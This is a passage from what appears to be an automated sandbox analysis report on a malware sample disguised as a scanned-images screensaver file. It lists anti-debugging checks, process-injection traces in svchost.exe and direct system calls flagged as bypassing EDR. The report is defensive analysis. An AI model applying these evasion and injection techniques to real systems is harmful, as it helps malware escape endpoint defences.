                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA456 mov eax, dword ptr fs:[00000030h]1_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]1_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]1_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]1_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]1_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]1_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]1_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04B00 mov eax, dword ptr fs:[00000030h]1_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928B50 mov eax, dword ptr fs:[00000030h]1_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEB50 mov eax, dword ptr fs:[00000030h]1_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]1_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]1_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]1_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A02B57 mov eax, dword ptr fs:[00000030h]1_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]1_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]1_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]1_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]1_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]1_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]1_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]1_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEA60 mov eax, dword ptr fs:[00000030h]1_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]1_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]1_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]1_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]1_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]1_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]1_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]1_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]1_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]1_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04940 mov eax, dword ptr fs:[00000030h]1_2_03A04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]1_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]1_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]1_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]1_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]1_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A008C0 mov eax, dword ptr fs:[00000030h]1_2_03A008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]1_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]1_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]1_2_03952835
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_004B0B62
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00482622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00482622
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0047083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0047083F
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004709D5 SetUnhandledExceptionFilter,0_2_004709D5
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_00470C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00470C21

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
